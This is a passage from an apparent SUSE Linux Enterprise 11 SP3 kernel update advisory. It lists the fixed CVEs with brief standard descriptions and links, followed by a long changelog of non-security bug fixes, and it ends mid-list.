CVE-2014-4027: The rd_build_device_space function in\n drivers/target/target_core_rd.c in the Linux kernel before 3.14 does not\n properly initialize a certain data structure, which allows local users to\n obtain sensitive information from ramdisk_mcp memory by leveraging access\n to a SCSI initiator. (bnc#882639)\n\n *\n\n CVE-2014-3153 The futex_requeue function in kernel/futex.c in the\n Linux kernel through 3.14.5 does not ensure that calls have two different\n futex addresses, which allows local users to gain privileges via a crafted\n FUTEX_REQUEUE command that facilitates unsafe waiter modification.\n (bnc#880892)\n\n *\n\n CVE-2014-6410: Avoid infinite loop when processing indirect ICBs\n (bnc#896689)\n\n The following non-security bugs have been fixed:\n\n * ACPI / PAD: call schedule() when need_resched() is true (bnc#866911).\n * ACPI: Fix bug when ACPI reset register is implemented in system\n memory (bnc#882900).\n * ACPI: Limit access to custom_method (bnc#884333).\n * ALSA: hda - Enabling Realtek ALC 671 codec (bnc#891746).\n * Add option to automatically enforce module signatures when in Secure\n Boot mode (bnc#884333).\n * Add secure_modules() call (bnc#884333).\n * Add wait_on_atomic_t() and wake_up_atomic_t() (bnc#880344).\n * Backported new patches of Lock down functions for UEFI secure boot\n Also updated series.conf and removed old patches.\n * Btrfs: Return EXDEV for cross file system snapshot.\n * Btrfs: abort the transaction when we does not find our extent ref.\n * Btrfs: avoid warning bomb of btrfs_invalidate_inodes.\n * Btrfs: cancel scrub on transaction abortion.\n * Btrfs: correctly set profile flags on seqlock retry.\n * Btrfs: does not check nodes for extent items.\n * Btrfs: fix a possible deadlock between scrub and transaction\n committing.\n * Btrfs: fix corruption after write/fsync failure + fsync + log\n recovery (bnc#894200).\n * Btrfs: fix csum tree corruption, duplicate and outdated checksums\n (bnc#891619).\n * Btrfs: fix double free in find_lock_delalloc_range.\n * Btrfs: fix possible memory leak in btrfs_create_tree().\n * Btrfs: fix use of uninit "ret" in end_extent_writepage().\n * Btrfs: free delayed node outside of root->inode_lock (bnc#866864).\n * Btrfs: make DEV_INFO ioctl available to anyone.\n * Btrfs: make FS_INFO ioctl available to anyone.\n * Btrfs: make device scan less noisy.\n * Btrfs: make sure there are not any read requests before stopping\n workers.\n * Btrfs: more efficient io tree navigation on wait_extent_bit.\n * Btrfs: output warning instead of error when loading free space cache\n failed.\n * Btrfs: retrieve more info from FS_INFO ioctl.\n * Btrfs: return EPERM when deleting a default subvolume (bnc#869934).\n * Btrfs: unset DCACHE_DISCONNECTED when mounting default subvol\n (bnc#866615).\n * Btrfs: use right type to get real comparison.\n * Btrfs: wake up @scrub_pause_wait as much as we can.\n * Btrfs: wake up transaction thread upon remount.\n * CacheFiles: Add missing retrieval completions (bnc#880344).\n * CacheFiles: Does not try to dump the index key if the cookie has\n been cleared (bnc#880344).\n * CacheFiles: Downgrade the requirements passed to the allocator\n (bnc#880344).\n * CacheFiles: Fix the marking of cached pages (bnc#880344).\n * CacheFiles: Implement invalidation (bnc#880344).\n * CacheFiles: Make some debugging statements conditional (bnc#880344).\n * Drivers: hv: util: Fix a bug in the KVP code (bnc#886840).\n * Drivers: hv: vmbus: Fix a bug in the channel callback dispatch code\n (bnc#886840).\n * FS-Cache: Add transition to handle invalidate immediately after\n lookup (bnc#880344).\n * FS-Cache: Check that there are no read ops when cookie relinquished\n (bnc#880344).\n * FS-Cache: Clear remaining page count on retrieval cancellation\n (bnc#880344).\n * FS-Cache: Convert the object event ID #defines into an enum\n (bnc#880344).\n * FS-Cache: Does not sleep in page release if __GFP_FS is not set\n (bnc#880344).\n * FS-Cache: Does not use spin_is_locked() in assertions (bnc#880344).\n * FS-Cache: Exclusive op submission can BUG if there is been an I/O\n error (bnc#880344).\n * FS-Cache: Fix __wait_on_atomic_t() to call the action func if the\n counter != 0 (bnc#880344).\n * FS-Cache: Fix object state machine to have separate work and wait\n states (bnc#880344).\n * FS-Cache: Fix operation state management and accounting (bnc#880344).\n * FS-Cache: Fix signal handling during waits (bnc#880344).\n * FS-Cache: Initialise the object event mask with the calculated mask\n (bnc#880344).\n * FS-Cache: Limit the number of I/O error reports for a cache\n (bnc#880344).\n * FS-Cache: Make cookie relinquishment wait for outstanding reads\n (bnc#880344).\n * FS-Cache: Mark cancellation of in-progress operation (bnc#880344).\n * FS-Cache: One of the write operation paths doeses not set the object\n state (bnc#880344).\n * FS-Cache: Provide proper invalidation (bnc#880344).\n * FS-Cache: Simplify cookie retention for fscache_objects, fixing oops\n (bnc#880344).\n * FS-Cache: The retrieval remaining-pages counter needs to be atomic_t\n (bnc#880344).\n * FS-Cache: Uninline fscache_object_init() (bnc#880344).\n * FS-Cache: Wrap checks on object state (bnc#880344).\n * HID: usbhid: add always-poll quirk (bnc#888607).\n * HID: usbhid: enable always-poll quirk for Elan Touchscreen\n (bnc#888607).\n * IB/iser: Add TIMEWAIT_EXIT event handling (bnc#890297).\n * Ignore "flags" change to event_constraint (bnc#876114).\n * Ignore data_src/weight changes to perf_sample_data (bnc#876114).\n * NFS: Allow more operations in an NFSv4.1 request (bnc#890513).\n * NFS: Clean up helper function nfs4_select_rw_stateid() (bnc#888968).\n * NFS: Does not copy read delegation stateids in setattr (bnc#888968).\n * NFS: Does not use a delegation to open a file when returning that\n delegation (bnc#888968, bnc#892200, bnc#893596, bnc#893496)\n * NFS: Fixes for NFS RCU-walk support in line with code going upstream\n * NFS: Use FS-Cache invalidation (bnc#880344).\n * NFS: allow lockless access to access_cache (bnc#866130).\n * NFS: avoid mountpoint being displayed as " (deleted)" in\n /proc/mounts (bnc#888591).\n * NFS: nfs4_do_open should add negative results to the dcache\n (bnc#866130).\n * NFS: nfs_migrate_page() does not wait for FS-Cache to finish with a\n page (bnc#880344).\n * NFS: nfs_open_revalidate: only evaluate parent if it will be used\n (bnc#866130).\n * NFS: prepare for RCU-walk support but pushing tests later in code\n (bnc#866130).\n * NFS: support RCU_WALK in nfs_permission() (bnc#866130).\n * NFS: teach nfs_lookup_verify_inode to handle LOOKUP_RCU (bnc#866130).\n * NFS: teach nfs_neg_need_reval to understand LOOKUP_RCU (bnc#866130).\n * NFSD: Does not hand out delegations for 30 seconds after recalling\n them (bnc#880370).\n * NFSv4 set open access operation call flag in nfs4_init_opendata_res\n (bnc#888968, bnc#892200, bnc#893596, bnc#893496).\n * NFSv4: Add a helper for encoding opaque data (bnc#888968).\n * NFSv4: Add a helper for encoding stateids (bnc#888968).\n * NFSv4: Add helpers for basic copying of stateids (bnc#888968).\n * NFSv4: Clean up nfs4_select_rw_stateid() (bnc#888968).\n * NFSv4: Fix the return value of nfs4_select_rw_stateid (bnc#888968).\n * NFSv4: Rename nfs4_copy_stateid() (bnc#888968).\n * NFSv4: Resend the READ/WRITE RPC call if a stateid change causes an\n error (bnc#888968).\n * NFSv4: Simplify the struct nfs4_stateid (bnc#888968).\n * NFSv4: The stateid must remain the same for replayed RPC calls\n (bnc#888968).\n * NFSv4: nfs4_stateid_is_current should return "true" for an invalid\n stateid (bnc#888968).\n * One more fix for kABI breakage.\n * PCI: Lock down BAR access when module security is enabled\n (bnc#884333).\n * PCI: enable MPS "performance" setting to properly handle bridge MPS\n (bnc#883376).\n * PM / Hibernate: Add memory_rtree_find_bit function (bnc#860441).\n * PM / Hibernate: Create a Radix-Tree to store memory bitmap\n (bnc#860441).\n * PM / Hibernate: Implement position keeping in radix tree\n (bnc#860441).\n * PM / Hibernate: Iterate over set bits instead of PFNs in\n swsusp_free() (bnc#860441).\n * PM / Hibernate: Remove the old memory-bitmap implementation\n (bnc#860441).\n * PM / Hibernate: Touch Soft Lockup Watchdog in rtree_next_node\n (bnc#860441).\n * Restrict /dev/mem and /dev/kmem when module loading is restricted\n (bnc#884333).\n * Reuse existing "state" field to indicate PERF_X86_EVENT_PEBS_LDLAT\n (bnc#876114).\n * USB: handle LPM errors during device suspend correctly (bnc#849123).\n * Update kabi files to reflect fscache change (bnc#880344)\n * Update x86_64 config files: re-enable SENSORS_W83627EHF (bnc#891281)\n * VFS: Make more complete truncate operation available to CacheFiles\n (bnc#880344).\n * [FEAT NET1222] ib_uverbs: Allow explicit mmio trigger (FATE#83366,\n ltc#83367).\n * acpi: Ignore acpi_rsdp kernel parameter when module loading is\n restricted (bnc#884333).\n * af_iucv: correct cleanup if listen backlog is full (bnc#885262,\n LTC#111728).\n * asus-wmi: Restrict debugfs interface when module loading is\n restricted (bnc#884333).\n * autofs4: allow RCU-walk to walk through autofs4 (bnc#866130).\n * autofs4: avoid taking fs_lock during rcu-walk (bnc#866130).\n * autofs4: does not take spinlock when not needed in\n autofs4_lookup_expiring (bnc#866130).\n * autofs4: factor should_expire() out of autofs4_expire_indirect\n (bnc#866130).\n * autofs4: make "autofs4_can_expire" idempotent (bnc#866130).\n * autofs4: remove a redundant assignment (bnc#866130).\n * autofs: fix lockref lookup (bnc#888591).\n * be2net: add dma_mapping_error() check for dma_map_page()\n (bnc#881759).\n * block: add cond_resched() to potentially long running ioctl discard\n loop (bnc#884725).\n * block: fix race between request completion and timeout handling\n (bnc#881051).\n * cdc-ether: clean packet filter upon probe (bnc#876017).\n * cpuset: Fix memory allocator deadlock (bnc#876590).\n * crypto: Allow CRYPTO_FIPS without MODULE_SIGNATURES. Not all archs\n have them, but some are FIPS certified, with some kernel support.\n * crypto: fips - only panic on bad/missing crypto mod signatures\n (bnc#887503).\n * crypto: testmgr - allow aesni-intel and ghash_clmulni-intel in fips\n mode (bnc#889451).\n * dasd: validate request size before building CCW/TCW (bnc#891087,\n LTC#114068).\n * dm mpath: fix race condition between multipath_dtr and pg_init_done\n (bnc#826486).\n * dm-mpath: fix panic on deleting sg device (bnc#870161).\n * drm/ast: AST2000 cannot be detected correctly (bnc#895983).\n * drm/ast: Actually load DP501 firmware when required (bnc#895608\n bnc#871134).\n * drm/ast: Add missing entry to dclk_table[].\n * drm/ast: Add reduced non reduced mode parsing for wide screen mode\n (bnc#892723).\n * drm/ast: initial DP501 support (v0.2) (bnc#871134).\n * drm/ast: open key before detect chips (bnc#895983).\n * drm/i915: Fix up cpt pixel multiplier enable sequence (bnc#879304).\n * drm/i915: Only apply DPMS to the encoder if enabled (bnc#893064).\n * drm/i915: clear the FPGA_DBG_RM_NOCLAIM bit at driver init\n (bnc#869055).\n * drm/i915: create functions for the "unclaimed register" checks\n (bnc#869055).\n * drm/i915: use FPGA_DBG for the "unclaimed register" checks\n (bnc#869055).\n * drm/mgag200: Initialize data needed to map fbdev memory (bnc\n #806990).\n * e1000e: enable support for new device IDs (bnc#885509).\n * fs/fscache: remove spin_lock() from the condition in while()\n (bnc#880344).\n * hibernate: Disable in a signed modules environment (bnc#884333).\n * hugetlb: does not use ERR_PTR with VM_FAULT* values\n * ibmvscsi: Abort init sequence during error recovery (bnc#885382).\n * ibmvscsi: Add memory barriers for send / receive (bnc#885382).\n * inet: add a redirect generation id in inetpeer (bnc#860593).\n * inetpeer: initialize ->redirect_genid in inet_getpeer() (bnc#860593).\n * ipv6: tcp: fix tcp_v6_conn_request() (bnc#887645).\n * kabi: hide bnc#860593 changes of struct inetpeer_addr_base\n (bnc#860593).\n * kernel: 3215 tty hang (bnc#891087, LTC#114562).\n * kernel: fix data corruption when reading /proc/sysinfo (bnc#891087,\n LTC#114480).\n * kernel: fix kernel oops with load of fpc register (bnc#889061,\n LTC#113596).\n * kernel: sclp console tty reference counting (bnc#891087, LTC#115466).\n * kexec: Disable at runtime if the kernel enforces module loading\n restrictions (bnc#884333).\n * md/raid6: avoid data corruption during recovery of double-degraded\n RAID6.\n * memcg, vmscan: Fix forced scan of anonymous pages (memory reclaim\n fix).\n * memcg: do not expose uninitialized mem_cgroup_per_node to world\n (bnc#883096).\n * mm, hugetlb: add VM_NORESERVE check in vma_has_reserves()\n * mm, hugetlb: change variable name reservations to resv\n * mm, hugetlb: decrement reserve count if VM_NORESERVE alloc page cache\n * mm, hugetlb: defer freeing pages when gathering surplus pages\n * mm, hugetlb: do not use a page in page cache for cow optimization\n * mm, hugetlb: fix and clean-up node iteration code to alloc or free\n * mm, hugetlb: fix race in region tracking\n * mm, hugetlb: fix subpool accounting handling\n * mm, hugetlb: improve page-fault scalability\n * mm, hugetlb: improve, cleanup resv_map parameters\n * mm, hugetlb: move up the code which check availability of free huge\n page\n * mm, hugetlb: protect reserved pages when soft offlining a hugepage\n * mm, hugetlb: remove decrement_hugepage_resv_vma()\n * mm, hugetlb: remove redundant list_empty check in\n gather_surplus_pages()\n * mm, hugetlb: remove resv_map_put\n * mm, hugetlb: remove useless check about mapping type\n * mm, hugetlb: return a reserved page to a reserved pool if failed\n * mm, hugetlb: trivial commenting fix\n * mm, hugetlb: unify region structure handling\n * mm, hugetlb: unify region structure handling kabi\n * mm, hugetlb: use long vars instead of int in region_count() (Hugetlb\n Fault Scalability).\n * mm, hugetlb: use vma_resv_map() map types\n * mm, oom: fix badness score underflow (bnc#884582, bnc#884767).\n * mm, oom: normalize oom scores to oom_score_adj scale only for\n userspace (bnc#884582, bnc#884767).\n * mm, thp: do not allow thp faults to avoid cpuset restrictions\n (bnc#888849).\n * net/mlx4_core: Load higher level modules according to ports type\n (bnc#887680).\n * net/mlx4_core: Load the IB driver when the device supports IBoE\n (bnc#887680).\n * net/mlx4_en: Fix a race between napi poll function and RX ring\n cleanup (bnc#863586).\n * net/mlx4_en: Fix selftest failing on non 10G link speed (bnc#888058).\n * net: fix checksumming features handling in output path (bnc#891259).\n * pagecache_limit: batch large nr_to_scan targets (bnc#895221).\n * pagecachelimit: reduce lru_lock congestion for heavy parallel\n reclaim fix (bnc#895680).\n * perf/core: Add weighted samples (bnc#876114).\n * perf/x86: Add flags to event constraints (bnc#876114).\n * perf/x86: Add memory profiling via PEBS Load Latency (bnc#876114).\n * perf: Add generic memory sampling interface (bnc#876114).\n * qla2xxx: Avoid escalating the SCSI error handler if the command is\n not found in firmware (bnc#859840).\n * qla2xxx: Clear loop_id for ports that are marked lost during fabric\n scanning (bnc#859840).\n * qla2xxx: Does not check for firmware hung during the reset context\n for ISP82XX (bnc#859840).\n * qla2xxx: Issue abort command for outstanding commands during cleanup\n when only firmware is alive (bnc#859840).\n * qla2xxx: Reduce the time we wait for a command to complete during\n SCSI error handling (bnc#859840).\n * qla2xxx: Set host can_queue value based on available resources\n (bnc#859840).\n * restore smp_mb() in unlock_new_inode() (bnc#890526).\n * s390/pci: introduce lazy IOTLB flushing for DMA unmap (bnc#889061,\n LTC#113725).\n * sched: fix the theoretical signal_wake_up() vs schedule() race\n (bnc#876055).\n * sclp_vt220: Enable integrated ASCII console per default (bnc#885262,\n LTC#112035).\n * scsi_dh: use missing accessor "scsi_device_from_queue" (bnc#889614).\n * scsi_transport_fc: Cap dev_loss_tmo by fast_io_fail (bnc#887608).\n * scsiback: correct grant page unmapping.\n * scsiback: fix retry handling in __report_luns().\n * scsiback: free resources after error.\n * sunrpc/auth: allow lockless (rcu) lookup of credential cache\n (bnc#866130).\n * supported.conf: remove external from drivers/net/veth (bnc#889727)\n * supported.conf: support net/sched/act_police.ko (bnc#890426)\n * tcp: adapt selected parts of RFC 5682 and PRR logic (bnc#879921).\n * tg3: Change nvram command timeout value to 50ms (bnc#855657).\n * tg3: Override clock, link aware and link idle mode during NVRAM dump\n (bnc#855657).\n * tg3: Set the MAC clock to the fastest speed during boot code load\n (bnc#855657).\n * usb: Does not enable LPM if the exit latency is zero (bnc#832309).\n * usbcore: Does not log on consecutive debounce failures of the same\n port (bnc#888105).\n * usbhid: fix PIXART optical mouse (bnc#888607).\n * uswsusp: Disable when module loading is restricted (bnc#884333).\n * vscsi: support larger transfer sizes (bnc#774818).\n * writeback: Do not sync data dirtied after sync start (bnc#833820).\n * x86 thermal: Delete power-limit-notification console messages\n (bnc#882317).\n * x86 thermal: Disable power limit notification interrupt by default\n (bnc#882317).\n * x86 thermal: Re-enable power limit notification interrupt by default\n (bnc#882317).\n * x86, cpu hotplug: Fix stack frame warning in\n check_irq_vectors_for_cpu_disable() (bnc#887418).\n * x86/UV: Add call to KGDB/KDB from NMI handler (bnc#888847).\n * x86/UV: Add kdump to UV NMI handler (bnc#888847).\n * x86/UV: Add summary of cpu activity to UV NMI handler (bnc#888847).\n * x86/UV: Move NMI support (bnc#888847).\n * x86/UV: Update UV support for external NMI signals (bnc#888847).\n * x86/uv/nmi: Fix Sparse warnings (bnc#888847).\n * x86: Add check for number of available vectors before CPU down\n (bnc#887418).\n * x86: Lock down IO port access when module security is enabled\n (bnc#884333).\n * x86: Restrict MSR access when module loading is restricted\n (bnc#884333).\n\n Security Issues:\n\n * CVE-2013-1979\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1979\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1979</a>>\n * CVE-2014-1739\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1739\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1739</a>>\n * CVE-2014-2706\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2706\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2706</a>>\n * CVE-2014-4027\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4027\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4027</a>>\n * CVE-2014-4171\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4171\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4171</a>>\n * CVE-2014-4508\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4508\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4508</a>>\n * CVE-2014-4667\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4667\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4667</a>>\n * CVE-2014-4943\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4943\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4943</a>>\n * CVE-2014-5077\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5077\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5077</a>>\n * CVE-2014-5471\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5471\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5471</a>>\n * CVE-2014-5472\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5472\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5472</a>>\n * CVE-2014-3153\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153</a>>\n * CVE-2014-6410\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6410\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6410</a>>\n\n The SUSE Linux Enterprise 11 Service Pack 3 kernel was updated to fix\n various bugs and security issues.\n\n Following security bugs were fixed: CVE-2013-1979: The scm_set_cred\n function in include/net/scm.h in the Linux kernel before 3.8.11 uses\n incorrect uid and gid values during credentials passing, which allows\n local users to gain privileges via a crafted application (bnc#816708).\n\n CVE-2014-1739: The media_device_enum_entities function in\n drivers/media/media-device.c in the Linux kernel before 3.14.6 does not\n initialize a certain data structure, which allows local users to obtain\n sensitive information from kernel memory by leveraging /dev/media0 read\n access for a MEDIA_IOC_ENUM_ENTITIES ioctl call (bnc#882804).\n\n CVE-2014-4171: mm/shmem.c in the Linux kernel through 3.15.1 does not\n properly implement the interaction between range notification and hole\n punching, which allows local users to cause a denial of service (i_mutex\n hold) by using the mmap system call to access a hole, as demonstrated by\n interfering with intended shmem activity by blocking completion of (1) an\n MADV_REMOVE madvise call or (2) an FALLOC_FL_PUNCH_HOLE fallocate call\n (bnc#883518).\n\n CVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel through\n 3.15.1 on 32-bit x86 platforms, when syscall auditing is enabled and the\n sep CPU feature flag is set, allows local users to cause a denial of\n service (OOPS and system crash) via an invalid syscall number, as\n demonstrated by number 1000 (bnc#883724).\n\n CVE-2014-4667: The sctp_association_free function in net/sctp/associola.c\n in the Linux kernel before 3.15.2 does not properly manage a certain\n backlog value, which allows remote attackers to cause a denial of service\n (socket outage) via a crafted SCTP packet (bnc#885422).\n\n CVE-2014-4943: The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux\n kernel through 3.15.6 allows local users to gain privileges by leveraging\n data-structure differences between an l2tp socket and an inet socket\n (bnc#887082).\n\n CVE-2014-5077: The sctp_assoc_update function in net/sctp/associola.c in\n the Linux kernel through 3.15.8, when SCTP authentication is enabled,\n allows remote attackers to cause a denial of service (NULL pointer\n dereference and OOPS) by starting to establish an association between two\n endpoints immediately after an exchange of INIT and INIT ACK chunks to\n establish an earlier association between these endpoints in the opposite\n direction (bnc#889173).\n\n CVE-2014-5471: Stack consumption vulnerability in the\n parse_rock_ridge_inode_internal function in fs/isofs/rock.c in the Linux\n kernel through 3.16.1 allows local users to cause a denial of service\n (uncontrolled recursion, and system crash or reboot) via a crafted iso9660\n image with a CL entry referring to a directory entry that has a CL entry.\n (bnc#892490)\n\n CVE-2014-5472: The parse_rock_ridge_inode_internal function in\n fs/isofs/rock.c in the Linux kernel through 3.16.1 allows local users to\n cause a denial of service (unkillable mount process) via a crafted iso9660\n image with a self-referential CL entry. (bnc#892490)\n\n CVE-2014-2706: Race condition in the mac80211 subsystem in the Linux\n kernel before 3.13.7 allows remote attackers to cause a denial of service\n (system crash) via network traffic that improperly interacts with the\n WLAN_STA_PS_STA state (aka power-save mode), related to sta_info.c and\n tx.c. (bnc#871797)\n\n CVE-2014-4027: The rd_build_device_space function in\n drivers/target/target_core_rd.c in the Linux kernel before 3.14 does not\n properly initialize a certain data structure, which allows local users to\n obtain sensitive information from ramdisk_mcp memory by leveraging access\n to a SCSI initiator. (bnc#882639)\n\n The following non-security bugs were fixed: - ACPI / PAD: call schedule()\n when need_resched() is true (bnc#866911). - ACPI: Fix bug when ACPI reset\n register is implemented in system memory (bnc#882900). - ACPI: Limit\n access to custom_method (bnc#884333). - Add option to automatically\n enforce module signatures when in Secure Boot mode (bnc#884333). - Add\n secure_modules() call (bnc#884333). - Add wait_on_atomic_t() and\n wake_up_atomic_t() (bnc#880344). - Backported new patches of Lock down\n functions for UEFI secure boot Also updated series.conf and removed old\n patches. - Btrfs: Return EXDEV for cross file system snapshot. - Btrfs:\n abort the transaction when we does not find our extent ref. - Btrfs: avoid\n warning bomb of btrfs_invalidate_inodes. - Btrfs: cancel scrub on\n transaction abortion. - Btrfs: correctly set profile flags on seqlock\n retry. - Btrfs: does not check nodes for extent items. - Btrfs: fix a\n possible deadlock between scrub and transaction committing. - Btrfs: fix\n corruption after write/fsync failure + fsync + log recovery (bnc#894200).\n - Btrfs: fix csum tree corruption, duplicate and outdated checksums\n (bnc#891619). - Btrfs: fix double free in find_lock_delalloc_range. -\n Btrfs: fix possible memory leak in btrfs_create_tree(). - Btrfs: fix use\n of uninit "ret" in end_extent_writepage(). - Btrfs: free delayed node\n outside of root->inode_lock (bnc#866864). - Btrfs: make DEV_INFO ioctl\n available to anyone. - Btrfs: make FS_INFO ioctl available to anyone. -\n Btrfs: make device scan less noisy. - Btrfs: make sure there are not any\n read requests before stopping workers. - Btrfs: more efficient io tree\n navigation on wait_extent_bit. - Btrfs: output warning instead of error\n when loading free space cache failed. - Btrfs: retrieve more info from\n FS_INFO ioctl. - Btrfs: return EPERM when deleting a default subvolume\n (bnc#869934). - Btrfs: unset DCACHE_DISCONNECTED when mounting default\n subvol (bnc#866615).\n - Btrfs: use right type to get real comparison. - Btrfs: wake up\n @scrub_pause_wait as much as we can. - Btrfs: wake up transaction thread\n upon remount. - CacheFiles: Add missing retrieval completions\n (bnc#880344).\n - CacheFiles: Does not try to dump the index key if the cookie has been\n cleared (bnc#880344). - CacheFiles: Downgrade the requirements passed to\n the allocator (bnc#880344). - CacheFiles: Fix the marking of cached\n pages (bnc#880344). - CacheFiles: Implement invalidation (bnc#880344). -\n CacheFiles: Make some debugging statements conditional (bnc#880344). -\n Drivers: hv: util: Fix a bug in the KVP code (bnc#886840). - Drivers:\n hv: vmbus: Fix a bug in the channel callback dispatch code (bnc#886840).\n - FS-Cache: Add transition to handle invalidate immediately after lookup\n (bnc#880344). - FS-Cache: Check that there are no read ops when cookie\n relinquished (bnc#880344). - FS-Cache: Clear remaining page count on\n retrieval cancellation (bnc#880344). - FS-Cache: Convert the object\n event ID #defines into an enum (bnc#880344). - FS-Cache: Does not sleep\n in page release if __GFP_FS is not set (bnc#880344). - FS-Cache: Does\n not use spin_is_locked() in assertions (bnc#880344). - FS-Cache:\n Exclusive op submission can BUG if there is been an I/O error\n (bnc#880344). - FS-Cache: Fix __wait_on_atomic_t() to call the action\n func if the counter != 0 (bnc#880344). - FS-Cache: Fix object state\n machine to have separate work and wait states (bnc#880344). - FS-Cache:\n Fix operation state management and accounting (bnc#880344). - FS-Cache:\n Fix signal handling during waits (bnc#880344). - FS-Cache: Initialise\n the object event mask with the calculated mask (bnc#880344). - FS-Cache:\n Limit the number of I/O error reports for a cache (bnc#880344). -\n FS-Cache: Make cookie relinquishment wait for outstanding reads\n (bnc#880344). - FS-Cache: Mark cancellation of in-progress operation\n (bnc#880344). - FS-Cache: One of the write operation paths doeses not\n set the object state (bnc#880344). - FS-Cache: Provide proper\n invalidation (bnc#880344). - FS-Cache: Simplify cookie retention for\n fscache_objects, fixing oops (bnc#880344). - FS-Cache: The retrieval\n remaining-pages counter needs to be atomic_t (bnc#880344). - FS-Cache:\n Uninline fscache_object_init() (bnc#880344). - FS-Cache: Wrap checks on\n object state (bnc#880344). - HID: usbhid: add always-poll quirk\n (bnc#888607). - HID: usbhid: enable always-poll quirk for Elan\n Touchscreen (bnc#888607). - IB/iser: Add TIMEWAIT_EXIT event handling\n (bnc#890297). - Ignore "flags" change to event_constraint (bnc#876114). -\n Ignore data_src/weight changes to perf_sample_data (bnc#876114). - NFS:\n Allow more\n operations in an NFSv4.1 request (bnc#890513). - NFS: Clean up helper\n function nfs4_select_rw_stateid() (bnc#888968). - NFS: Does not copy read\n delegation stateids in setattr (bnc#888968). - NFS: Does not use a\n delegation to open a file when returning that delegation (bnc#888968,\n bnc#892200, bnc#893596, bnc#893496) - NFS: Fixes for NFS RCU-walk support\n in line with code going upstream - NFS: Use FS-Cache invalidation\n (bnc#880344). - NFS: allow lockless access to access_cache (bnc#866130).\n - NFS: avoid mountpoint being displayed as " (deleted)" in /proc/mounts\n (bnc#888591). - NFS: nfs4_do_open should add negative results to the\n dcache (bnc#866130). - NFS: nfs_migrate_page() does not wait for FS-Cache\n to finish with a page (bnc#880344). - NFS: nfs_open_revalidate: only\n evaluate parent if it will be used (bnc#866130). - NFS: prepare for\n RCU-walk support but pushing tests later in code (bnc#866130). - NFS:\n support RCU_WALK in nfs_permission() (bnc#866130). - NFS: teach\n nfs_lookup_verify_inode to handle LOOKUP_RCU (bnc#866130). - NFS: teach\n nfs_neg_need_reval to understand LOOKUP_RCU (bnc#866130). - NFSD: Does\n not hand out delegations for 30 seconds after recalling them\n (bnc#880370). - NFSv4 set open access\n operation call flag in nfs4_init_opendata_res (bnc#888968, bnc#892200,\n bnc#893596, bnc#893496). - NFSv4: Add a helper for encoding opaque data\n (bnc#888968). - NFSv4: Add a helper for encoding stateids (bnc#888968). -\n NFSv4: Add helpers for basic copying of stateids (bnc#888968). - NFSv4:\n Clean up nfs4_select_rw_stateid() (bnc#888968). - NFSv4: Fix the return\n value of nfs4_select_rw_stateid (bnc#888968). - NFSv4: Rename\n nfs4_copy_stateid() (bnc#888968). - NFSv4: Resend the READ/WRITE RPC call\n if a stateid change causes an error (bnc#888968). - NFSv4: Simplify the\n struct nfs4_stateid (bnc#888968). - NFSv4: The stateid must remain the\n same for replayed RPC calls (bnc#888968). - NFSv4:\n nfs4_stateid_is_current should return "true" for an invalid stateid\n (bnc#888968). - One more fix for kABI breakage. - PCI: Lock down BAR\n access when module security is enabled (bnc#884333). - PCI: enable MPS\n "performance" setting to properly handle bridge MPS (bnc#883376). - PM /\n Hibernate: Add memory_rtree_find_bit function (bnc#860441). - PM /\n Hibernate: Create a Radix-Tree to store memory bitmap (bnc#860441). - PM\n / Hibernate: Implement position keeping in radix tree (bnc#860441). - PM\n / Hibernate: Iterate over set bits instead of PFNs in swsusp_free()\n (bnc#860441). - PM / Hibernate: Remove the old memory-bitmap\n implementation (bnc#860441). - PM / Hibernate: Touch Soft Lockup Watchdog\n in rtree_next_node (bnc#860441). - Restrict /dev/mem and /dev/kmem when\n module loading is restricted (bnc#884333). - Reuse existing "state" field\n to indicate PERF_X86_EVENT_PEBS_LDLAT (bnc#876114). - USB: handle LPM\n errors during device suspend correctly (bnc#849123). - Update kabi files\n to reflect fscache change (bnc#880344) - VFS: Make more complete truncate\n operation available to CacheFiles (bnc#880344). - [FEAT NET1222]\n ib_uverbs: Allow explicit mmio trigger (FATE#83366, ltc#83367). - acpi:\n Ignore acpi_rsdp kernel parameter when module loading is restricted\n (bnc#884333). - af_iucv: correct cleanup if listen backlog is full\n (bnc#885262, LTC#111728). - asus-wmi: Restrict debugfs interface when\n module loading is restricted 